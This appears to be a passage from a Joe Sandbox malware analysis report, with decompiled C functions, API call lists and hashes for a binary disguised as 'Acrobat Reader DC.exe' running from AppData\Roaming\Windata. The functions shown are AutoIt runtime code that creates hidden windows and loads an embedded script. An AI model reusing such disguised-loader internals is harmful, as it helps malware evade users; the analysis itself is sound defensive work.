                                  • API ID: QueryValue$CloseOpen
                                  • String ID: Include$Software\AutoIt v3\AutoIt
                                  • API String ID: 1586453840-614718249
                                  • Opcode ID: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                  • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                                  • Opcode Fuzzy Hash: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                  • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00410570 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1410 410570-4105f1 CreateWindowExW * 2 ShowWindow * 2
                                  C-Code - Quality: 100%
                                  			E00410570() {
				struct HWND__* _t2;
				struct HWND__* _t3;
				int _t6;

				_t2 = CreateWindowExW(0, L"AutoIt v3", L"AutoIt v3", 0xcf0000, 0x80000000, 0x80000000, 0x12c, 0x64, 0, 0,  *0x497520, 0); // executed
				 *0x497518 = _t2; // executed
				_t3 = CreateWindowExW(0, L"edit", 0, 0x50b008c4, 0, 0, 0, 0, _t2, 1,  *0x497520, 0); // executed
				 *0x497514 = _t3; // executed
				ShowWindow( *0x497518, 0); // executed
				_t6 = ShowWindow( *0x497518, 0); // executed
				return _t6;
			}






                                  0x004105a5
                                  0x004105c9
                                  0x004105ce
                                  0x004105df
                                  0x004105e4
                                  0x004105ee
                                  0x004105f1

                                  APIs
                                  • CreateWindowExW.USER32 ref: 004105A5
                                  • CreateWindowExW.USER32 ref: 004105CE
                                  • ShowWindow.USER32(?,00000000), ref: 004105E4
                                  • ShowWindow.USER32(?,00000000), ref: 004105EE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Window$CreateShow
                                  • String ID: AutoIt v3$edit
                                  • API String ID: 1584632944-3779509399
                                  • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                  • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                                  • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                  • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040F250 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040F250(short* __edx, char* __esi, void* _a4, short* _a8, intOrPtr _a12) {
				int _v8;
				void* _v12;
				int* _t19;
				long _t22;
				signed int _t27;
				int _t44;

				 *__esi = 0;
				_t19 = RegOpenKeyExW(_a4, __edx, 0, 1,  &_v12); // executed
				if(_t19 != 0) {
					return 0;
				} else {
					_t44 = _a12 + _a12;
					_v8 = _t44;
					_t22 = RegQueryValueExW(_v12, _a8, _t19, _t19, __esi,  &_v8); // executed
					if(_t22 != 0) {
						RegCloseKey(_v12);
						return 0;
					} else {
						_t27 = _v8 >> 1;
						_v8 = _t27;
						if(_t27 >= _a12) {
							 *((short*)(_t44 + __esi - 2)) = 0;
						} else {
							 *((short*)(__esi + _t27 * 2)) = 0;
						}
						RegCloseKey(_v12); // executed
						return 1;
					}
				}
			}









                                  0x0040f25f
                                  0x0040f267
                                  0x0040f26f
                                  0x00425e1c
                                  0x0040f275
                                  0x0040f288
                                  0x0040f28b
                                  0x0040f28e
                                  0x0040f296
                                  0x0040f2c9
                                  0x0040f2d6
                                  0x0040f298
                                  0x0040f29b
                                  0x0040f29d
                                  0x0040f2a3
                                  0x00425e1f
                                  0x0040f2a9
                                  0x0040f2ab
                                  0x0040f2ab
                                  0x0040f2b5
                                  0x0040f2c2
                                  0x0040f2c2
                                  0x0040f296

                                  APIs
                                  • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                                  • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                                  • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                                  • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Close$OpenQueryValue
                                  • String ID: Control Panel\Mouse
                                  • API String ID: 1607946009-824357125
                                  • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                  • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                                  • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                  • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00414ABA Relevance: 7.7, APIs: 5, Instructions: 160COMMONLIBRARYCODE
                                  Download Yara Rule
                                  C-Code - Quality: 97%
                                  			E00414ABA(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
				signed int _v8;
				char* _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t82;
				char _t89;
				signed int _t96;
				signed int _t98;
				signed int _t101;
				signed int _t104;
				signed int _t108;
				signed int _t109;
				char* _t110;
				signed int _t120;
				signed int _t123;
				signed int _t124;
				signed int _t125;
				signed int _t126;
				void* _t127;

				_t110 = _a4;
				_t108 = _a8;
				_t123 = _a12;
				_v12 = _t110;
				_v8 = _t108;
				if(_t123 == 0 || _a16 == 0) {
					L5:
					return 0;
				} else {
					_t131 = _t110;
					if(_t110 != 0) {
						_t126 = _a20;
						__eflags = _t126;
						if(_t126 == 0) {
							L9:
							__eflags = _t108 - 0xffffffff;
							if(_t108 != 0xffffffff) {
								_t82 = E00412F40(_t110, 0, _t108);
								_t127 = _t127 + 0xc;
							}
							__eflags = _t126;
							if(__eflags == 0) {
								goto L3;
							} else {
								__eflags = _a16 - (_t82 | 0xffffffff) / _t123;
								if(__eflags > 0) {
									goto L3;
								}
								L13:
								_t124 = _t123 * _a16;
								__eflags =  *(_t126 + 0xc) & 0x0000010c;
								_v20 = _t124;
								_t109 = _t124;
								if(( *(_t126 + 0xc) & 0x0000010c) == 0) {
									_v16 = 0x1000;
								} else {
									_v16 =  *((intOrPtr*)(_t126 + 0x18));
								}
								__eflags = _t124;
								if(_t124 == 0) {
									L40:
									return _a16;
								} else {
									do {
										__eflags =  *(_t126 + 0xc) & 0x0000010c;
										if(( *(_t126 + 0xc) & 0x0000010c) == 0) {
											L24:
											__eflags = _t109 - _v16;
											if(_t109 < _v16) {
												_t89 = E0041D8F3(_t109, _t124, _t126); // executed
												__eflags = _t89 - 0xffffffff;
												if(_t89 == 0xffffffff) {
													L45:
													return (_t124 - _t109) / _a12;
												}
												__eflags = _v8;
												if(_v8 == 0) {
													L41:
													__eflags = _a8 - 0xffffffff;
													if(__eflags != 0) {
														E00412F40(_a4, 0, _a8);
													}
													 *((intOrPtr*)(E00417F77(__eflags))) = 0x22;
													L4:
													E00417F25();
													goto L5;
												}
												_v12 = _v12 + 1;
												 *_v12 = _t89;
												_t109 = _t109 - 1;
												_t65 =  &_v8;
												 *_t65 = _v8 - 1;
												__eflags =  *_t65;
												_v16 =  *((intOrPtr*)(_t126 + 0x18));
												goto L39;
											}
											__eflags = _v16;
											if(_v16 == 0) {
												_t96 = 0x7fffffff;
												__eflags = _t109 - 0x7fffffff;
												if(_t109 <= 0x7fffffff) {
													_t96 = _t109;
												}
											} else {
												__eflags = _t109 - 0x7fffffff;
												if(_t109 <= 0x7fffffff) {
													_t50 = _t109 % _v16;
													__eflags = _t50;
													_t120 = _t50;
													_t101 = _t109;
												} else {
													_t120 = 0x7fffffff % _v16;
													_t101 = 0x7fffffff;
												}
												_t96 = _t101 - _t120;
											}
											__eflags = _t96 - _v8;
											if(_t96 > _v8) {
												goto L41;
											} else {
												_push(_t96);
												_push(_v12);
												_push(E00414139(_t126)); // executed
												_t98 = E0041DFCC(_t109, _t124, _t126, __eflags); // executed
												_t127 = _t127 + 0xc;
												__eflags = _t98;
												if(_t98 == 0) {
													 *(_t126 + 0xc) =  *(_t126 + 0xc) | 0x00000010;
													goto L45;
												}
												__eflags = _t98 - 0xffffffff;
												if(_t98 == 0xffffffff) {
													L44:
													_t72 = _t126 + 0xc;
													 *_t72 =  *(_t126 + 0xc) | 0x00000020;
													__eflags =  *_t72;
													goto L45;
												}
												_v12 = _v12 + _t98;
												_t109 = _t109 - _t98;
												_v8 = _v8 - _t98;
												goto L39;
											}
										}
										_t104 =  *(_t126 + 4);
										__eflags = _t104;
										if(__eflags == 0) {
											goto L24;
										}
										if(__eflags < 0) {
											goto L44;
										}
										_t125 = _t109;
										__eflags = _t109 - _t104;
										if(_t109 >= _t104) {
											_t125 = _t104;
										}
										__eflags = _t125 - _v8;
										if(_t125 > _v8) {
											goto L41;
										} else {
											E0041E0C2(_v12, _v8,  *_t126, _t125);
											 *(_t126 + 4) =  *(_t126 + 4) - _t125;
											 *_t126 =  *_t126 + _t125;
											_v12 = _v12 + _t125;
											_t109 = _t109 - _t125;
											_t127 = _t127 + 0x10;
											_v8 = _v8 - _t125;
											_t124 = _v20;
										}
										L39:
										__eflags = _t109;
									} while (_t109 != 0);
									goto L40;
								}
							}
						}
						_t82 = (_t82 | 0xffffffff) / _t123;
						__eflags = _a16 - _t82;
						if(_a16 <= _t82) {
							goto L13;
						}
						goto L9;
					}
					L3:
					 *((intOrPtr*)(E00417F77(_t131))) = 0x16;
					goto L4;
				}
			}


























                                  0x00414ac2
                                  0x00414ac6
                                  0x00414acb
                                  0x00414ace
                                  0x00414ad1
                                  0x00414ad6
                                  0x00414af2
                                  0x00000000
                                  0x00414ade
                                  0x00414ade
                                  0x00414ae0
                                  0x00414af9
                                  0x00414afc
                                  0x00414afe
                                  0x00414b0c
                                  0x00414b0c
                                  0x00414b0f
                                  0x00414b15
                                  0x00414b1a
                                  0x00414b1a
                                  0x00414b1d
                                  0x00414b1f
                                  0x00000000
                                  0x00414b21
                                  0x00414b28
                                  0x00414b2b
                                  0x00000000
                                  0x00000000
                                  0x00414b2d
                                  0x00414b2d
                                  0x00414b31
                                  0x00414b38
                                  0x00414b3b
                                  0x00414b3d
                                  0x00414b47
                                  0x00414b3f
                                  0x00414b42
                                  0x00414b42
                                  0x00414b4e
                                  0x00414b50
                                  0x00414c30
                                  0x00000000
                                  0x00414b56
                                  0x00414b56
                                  0x00414b56
                                  0x00414b5d
                                  0x00414ba3
                                  0x00414ba3
                                  0x00414ba6
                                  0x00414c05
                                  0x00414c0b
                                  0x00414c0e
                                  0x00414c62
                                  0x00000000
                                  0x00414c68
                                  0x00414c10
                                  0x00414c14
                                  0x00414c38
                                  0x00414c38
                                  0x00414c3c
                                  0x00414c46
                                  0x00414c4b
                                  0x00414c53
                                  0x00414aed
                                  0x00414aed
                                  0x00000000
                                  0x00414aed
                                  0x00414c19
                                  0x00414c1c
                                  0x00414c21
                                  0x00414c22
                                  0x00414c22
                                  0x00414c22
                                  0x00414c25
                                  0x00000000
                                  0x00414c25
                                  0x00414ba8
                                  0x00414bac
                                  0x00414bcd
                                  0x00414bd2
                                  0x00414bd4
                                  0x00414bd6
                                  0x00414bd6
                                  0x00414bae
                                  0x00414bb5
                                  0x00414bb7
                                  0x00414bc4
                                  0x00414bc4
                                  0x00414bc4
                                  0x00414bc7
                                  0x00414bb9
                                  0x00414bbb
                                  0x00414bbe
                                  0x00414bbe
                                  0x00414bc9
                                  0x00414bc9
                                  0x00414bd8
                                  0x00414bdb
                                  0x00000000
                                  0x00414bdd
                                  0x00414bdd
                                  0x00414bde
                                  0x00414be8
                                  0x00414be9
                                  0x00414bee
                                  0x00414bf1
                                  0x00414bf3
                                  0x00414c70
                                  0x00000000
                                  0x00414c70
                                  0x00414bf5
                                  0x00414bf8
                                  0x00414c5e
                                  0x00414c5e
                                  0x00414c5e
                                  0x00414c5e
                                  0x00000000
                                  0x00414c5e
                                  0x00414bfa
                                  0x00414bfd
                                  0x00414bff
                                  0x00000000
                                  0x00414bff
                                  0x00414bdb
                                  0x00414b5f
                                  0x00414b62
                                  0x00414b64
                                  0x00000000
                                  0x00000000
                                  0x00414b66
                                  0x00000000
                                  0x00000000
                                  0x00414b6c
                                  0x00414b6e
                                  0x00414b70
                                  0x00414b72
                                  0x00414b72
                                  0x00414b74
                                  0x00414b77
                                  0x00000000
                                  0x00414b7d
                                  0x00414b86
                                  0x00414b8b
                                  0x00414b8e
                                  0x00414b90
                                  0x00414b93
                                  0x00414b95
                                  0x00414b98
                                  0x00414b9b
                                  0x00414b9b
                                  0x00414c28
                                  0x00414c28
                                  0x00414c28
                                  0x00000000
                                  0x00414b56
                                  0x00414b50
                                  0x00414b1f
                                  0x00414b05
                                  0x00414b07
                                  0x00414b0a
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00414b0a
                                  0x00414ae2
                                  0x00414ae7
                                  0x00000000
                                  0x00414ae7

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _memset$__filbuf__getptd_noexit__read_memcpy_s
                                  • String ID:
                                  • API String ID: 4048096073-0
                                  • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                  • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                                  • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                  • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040F520 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 52COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040F520(short* __eax, void* __esi, void* __fp0, intOrPtr _a4) {
				intOrPtr _v36;
				intOrPtr _v44;
				char* _v48;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char* _v84;
				intOrPtr _v92;
				struct tagOFNA _v96;
				void* __ebx;
				void* __edi;
				int _t18;
				void* _t24;
				char* _t28;
				short* _t33;
				void* _t34;
				void* _t38;

				_t38 = __fp0;
				_t34 = __esi;
				_t33 = __eax;
				 *((char*)(__esi + 3)) =  *0x4974e8;
				_t37 =  *__eax;
				if( *__eax == 0) {
					_t31 =  &_v96;
					 *_t28 = 1;
					E00412F40( &_v96, 0, 0x58);
					_v96 = 0x58;
					_v48 = L"Run Script:";
					_v92 = 0;
					_v68 = _t33;
					_v64 = 0x104;
					_v84 = L"AutoIt script files (*.au3, *.a3x)";
					_v72 = 1;
					_v44 = 0x1804;
					_v36 = L"au3";
					_t18 = GetOpenFileNameW( &_v96);
					__eflags = _t18;
					if(_t18 != 0) {
						goto L1;
					}
					return 0;
				}
				L1:
				E00410120(_t33, _t33, _t31);
				E004102B0(_t33, _t33, _t34); // executed
				_t24 = E0040F570(_t33, _a4, _t33, _t37, _t38, _t34, E00410190(_t34, _t33, _t33), _a4); // executed
				return _t24;
			}




















                                  0x0040f520
                                  0x0040f520
                                  0x0040f528
                                  0x0040f52f
                                  0x0040f532
                                  0x0040f536
                                  0x004295cb
                                  0x004295d1
                                  0x004295d4
                                  0x004295e0
                                  0x004295e7
                                  0x004295ee
                                  0x004295f5
                                  0x004295f8
                                  0x004295ff
                                  0x00429606
                                  0x0042960d
                                  0x00429614
                                  0x0042961b
                                  0x00429621
                                  0x00429623
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00429629
                                  0x0040f53c
                                  0x0040f540
                                  0x0040f547
                                  0x0040f55d
                                  0x00000000

                                  APIs
                                  • _memset.LIBCMT ref: 004295D4
                                  • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                    • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe,0040F545,C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe,004A90E8,C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe,?,0040F545), ref: 0041013C
                                    • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                    • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                    • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                    • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                    • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                    • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen_memset
                                  • String ID: X$pWH
                                  • API String ID: 2873425188-941433119
                                  • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                  • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                                  • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                  • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040F570 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 247COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 63%
                                  			E0040F570(void* __eax, void* __ecx, void* __edx, void* __eflags, signed int __fp0, intOrPtr _a4, void* _a8, signed int _a12) {
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				short _v26;
				short _v28;
				signed int _v32;
				signed int _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v64;
				char _v80;
				char _v96;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t97;
				signed int* _t99;
				signed int* _t108;
				signed int* _t119;
				signed int* _t120;
				signed int* _t122;
				intOrPtr _t129;
				void* _t130;
				signed int _t131;
				signed int _t142;
				signed int* _t146;
				signed int _t157;
				signed int _t159;
				void* _t160;
				signed int _t162;
				signed int _t164;
				signed int _t170;
				signed int _t174;
				signed int _t178;
				signed int _t179;
				signed int _t181;
				void* _t184;
				intOrPtr _t195;
				intOrPtr _t202;
				signed int _t203;
				void* _t209;
				signed int _t212;
				signed int _t215;
				void* _t217;
				void* _t218;

				_t224 = __fp0;
				_t184 = __edx;
				_t209 = __eax;
				_t97 = E0040F760(__ecx,  &_v48, __eflags, __eax); // executed
				if(_t97 == 0) {
					_t164 =  &_v48;
					_t99 = E004528BD(__eflags, _t164, L">>>AUTOIT SCRIPT<<<",  &_a8,  &_a12); // executed
					__eflags = _t99;
					if(__eflags == 0) {
						_t101 =  *_a8;
						_t202 = _a4;
						_t14 = _t101 + 1; // 0x2
						_t210 = _t14;
						 *((intOrPtr*)(_t202 + 0x10)) =  *_a8;
						_v28 = _t164 | 0xffffffff;
						_t157 = 0;
						_a12 = 4;
						_v64 = 0x485a84;
						_v60 = 0;
						_v56 = 0;
						_v52 = 0;
						_t170 = ( ~(0 | __eflags > 0x00000000) | _t210 * 0x00000010) + 4;
						_push( ~(0 | __eflags > 0x00000000) | _t170);
						_t108 = E004115D7(_t202, _t210, __eflags);
						_t218 = _t217 + 4;
						__eflags = _t108;
						if(_t108 != 0) {
							_t30 =  &(_t108[1]); // 0x4
							_t170 = _t30;
							 *_t108 = _t210;
							_v24 = _t170;
							E00410CA0(_t210, 0x4023e8, _t170, 0x10);
							_t157 = _v24;
						}
						_t171 = _t170 | 0xffffffff;
						 *((intOrPtr*)(_t202 + 0x44)) = _t157;
						_v26 = _t170 | 0xffffffff;
						__eflags =  *((intOrPtr*)(_t202 + 0x10)) - 1;
						if( *((intOrPtr*)(_t202 + 0x10)) < 1) {
							L29:
							E00413748(_a8); // executed
							E00431E58( &_v48); // executed
							E0040EDC0( &_v64, _t202, _t210);
							E0044B469(__eflags,  &_v36);
							return 1;
						}
						_v20 = 1;
						_v24 = 0x10;
						do {
							E0040D530( &_v64, _t171);
							goto L12;
							do {
								while(1) {
									L12:
									_t174 = _a12;
									_t159 =  *(_t174 + _a8) & 0x000000ff;
									_t203 = _t159;
									_a12 = _t174 + 1;
									E00402710(_t203,  &_v36, _t224);
									_t119 = E0043259D( &_v36);
									__eflags = _t119;
									if(_t119 != 0) {
										break;
									}
									_t171 =  &_v36;
									_t120 = E0043257B( &_v36);
									__eflags = _t120;
									if(_t120 == 0) {
										_t122 = E00432559( &_v36);
										__eflags = _t122;
										if(_t122 == 0) {
											__eflags = E004325BE( &_v36);
											if(__eflags == 0) {
												goto L27;
											}
											_t171 =  &_a12;
											_v16 = _t159;
											_t130 = E00444AF8(__eflags, _a8,  &_a12); // executed
											_t160 = _t130;
											_t131 = _t203;
											__eflags = _t131 - 0x31;
											if(__eflags != 0) {
												__eflags = _t131 - 0x30;
												if(__eflags != 0) {
													_push(_t160);
													__eflags = _t131 - 0x37;
													if(__eflags != 0) {
														_push( &_v36); // executed
														E0044B41C( &_a12, _t203,  &_v36, __eflags); // executed
														L26:
														_push(_t160);
														E004111DC();
														_t159 = _v16;
														_t218 = _t218 + 4;
														goto L27;
													}
													_push(_a4);
													E0044C7DD( &_a12, _t203);
													_push(_t160);
													E004111DC();
													_t218 = _t218 + 4;
													continue;
												}
												E00401B10(_t160,  &_v96, __eflags);
												_v12 = E00444A7E(__eflags,  &_v96);
												E00402250( &_v96);
												E00402710(0,  &_v36, _t224);
												_t171 = _v12;
												_v36 = _v12;
												goto L26;
											}
											_t215 =  &_v80;
											E00401B10(_t160, _t215, __eflags);
											_t142 = E00444ABD(_a4, _t215);
											_t171 = _t215;
											_v12 = _t142;
											E00402250(_t215);
											E00402710(1,  &_v36, _t224);
											_v36 = _v12;
											goto L26;
										}
										_t178 = _a12;
										_t195 = _a8;
										_t224 =  *(_t178 + _t195);
										_t171 = _t178 + 8;
										_v36 =  *(_t178 + _t195);
										_a12 = _t178 + 8;
										goto L27;
									}
									_t179 = _a12;
									_t146 = _t179 + _a8;
									_a12 = _t179 + 8;
									_t171 =  *_t146;
									_v36 =  *_t146;
									_v32 = _t146[1];
									goto L27;
								}
								_t181 = _a12;
								_t171 = _t181 + 4;
								_a12 = _t181 + 4;
								_v36 =  *(_t181 + _a8);
								L27:
								E00402780( &_v36, _t171,  &_v64);
								__eflags = _t159 - 0x7f;
							} while (_t159 != 0x7f);
							_t212 = _v24;
							_t202 = _a4;
							E004022D0( *((intOrPtr*)(_t202 + 0x44)) + _t212,  &_v64); // executed
							_t129 = _v20 + 1;
							_t210 = _t212 + 0x10;
							_v20 = _t129;
							_v24 = _t212 + 0x10;
							__eflags = _t129 -  *((intOrPtr*)(_t202 + 0x10));
						} while (_t129 <=  *((intOrPtr*)(_t202 + 0x10)));
						goto L29;
					}
					E00431E58( &_v48);
					L6:
					E00434034( *((intOrPtr*)(_a4 + 0x48)),  *(_a4 + 3) & 0x000000ff);
					return 0;
				}
				_t162 = _a12;
				if( *_t162 == 4) {
					goto L6;
				}
				 *_t162 = 2;
				return E004033C0(_t184, __fp0, _a4, _t209, _a8, _t209, 0x484ea8, 0);
			}



















































                                  0x0040f570
                                  0x0040f570
                                  0x0040f579
                                  0x0040f57f
                                  0x0040f586
                                  0x00429342
                                  0x00429346
                                  0x0042934b
                                  0x0042934d
                                  0x00429376
                                  0x00429378
                                  0x0042937e
                                  0x0042937e
                                  0x00429381
                                  0x00429384
                                  0x0042938a
                                  0x00429398
                                  0x0042939f
                                  0x004293a6
                                  0x004293a9
                                  0x004293ac
                                  0x004293b5
                                  0x004293bf
                                  0x004293c0
                                  0x004293c5
                                  0x004293c8
                                  0x004293ca
                                  0x004293cc
                                  0x004293cc
                                  0x004293cf
                                  0x004293da
                                  0x004293dd
                                  0x004293e2
                                  0x004293e2
                                  0x004293e5
                                  0x004293ed
                                  0x004293f0
                                  0x004293f4
                                  0x004293f7
                                  0x0042959c
                                  0x004295a0
                                  0x004295ac
                                  0x004295b4
                                  0x004295bd
                                  0x00000000
                                  0x004295c2
                                  0x004293fd
                                  0x00429400
                                  0x00429407
                                  0x0042940a
                                  0x0042940a
                                  0x0042940f
                                  0x0042940f
                                  0x0042940f
                                  0x0042940f
                                  0x00429415
                                  0x0042941d
                                  0x00429422
                                  0x00429425
                                  0x0042942b
                                  0x00429430
                                  0x00429432
                                  0x00000000
                                  0x00000000
                                  0x0042944d
                                  0x00429451
                                  0x00429456
                                  0x00429458
                                  0x0042947d
                                  0x00429482
                                  0x00429484
                                  0x004294a9
                                  0x004294ab
                                  0x00000000
                                  0x00000000
                                  0x004294b4
                                  0x004294b9
                                  0x004294bc
                                  0x004294c1
                                  0x004294c3
                                  0x004294c5
                                  0x004294c8
                                  0x004294fd
                                  0x00429500
                                  0x0042952e
                                  0x0042952f
                                  0x00429532
                                  0x0042954e
                                  0x0042954f
                                  0x00429554
                                  0x00429554
                                  0x00429555
                                  0x0042955a
                                  0x0042955d
                                  0x00000000
                                  0x0042955d
                                  0x00429537
                                  0x00429538
